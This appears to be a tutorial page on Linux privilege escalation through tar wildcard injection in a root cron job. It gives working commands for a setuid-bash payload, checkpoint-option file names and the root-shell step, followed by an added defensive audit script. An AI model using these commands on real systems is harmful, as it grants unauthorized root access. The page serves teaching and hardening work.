Linux privilege escalation with tar
Privileges can be escalated through the tar command when it is run with a wildcard, typically from a cron job executed as the root user. The shell expands the wildcard before tar runs, so the file names in the directory end up on tar's command line.
cron
*/1 * * * * root tar -zcf /var/backups/home-john.tgz /home/john/*
Exploitation
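# Script that copies bash and sets the setuid bit on the copy
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > /home/john/payload.sh
chmod +x /home/john/payload.sh
# File names that tar reads as its checkpoint options
touch /home/john/--checkpoint=1
touch /home/john/--checkpoint-action=exec=sh\ payload.sh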
Escalation
/tmp/bash -p
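
To audit for the pattern described above, the following is an added example, not part of the original page: it flags cron lines that hand a wildcard to tar and lists option-like file names in a directory. The function names and the wildcard-free cron rewrite are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added defensive example; function names are hypothetical.

# Print entries directly inside directory $1 whose names begin with "-".
# Such names can be taken as options by a command that receives them
# through wildcard expansion.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Return 0 (needs review) when a cron line passes a "*" wildcard to tar.
# Only text after the tar command is checked, so the "*" fields of the
# cron schedule do not trigger a match.
cron_line_is_risky() {
    case "$1" in
        \#*) return 1 ;;   # skip comment lines
    esac
    printf '%s\n' "$1" | grep -Eq '(^|[[:space:];&|/])tar[[:space:]].*\*'
}

# The page's cron entry, and an assumed rewrite that archives the same
# directory by name (-C /home john) so no file name becomes an argument.
vulnerable='*/1 * * * * root tar -zcf /var/backups/home-john.tgz /home/john/*'
hardened='*/1 * * * * root tar -zcf /var/backups/home-john.tgz -C /home john'

for line in "$vulnerable" "$hardened"; do
    if cron_line_is_risky "$line"; then
        echo "REVIEW: $line"
    else
        echo "ok:     $line"
    fi
done
```

Running option_like_names against a directory that a privileged job archives shows entries such as --checkpoint=1 that warrant investigation.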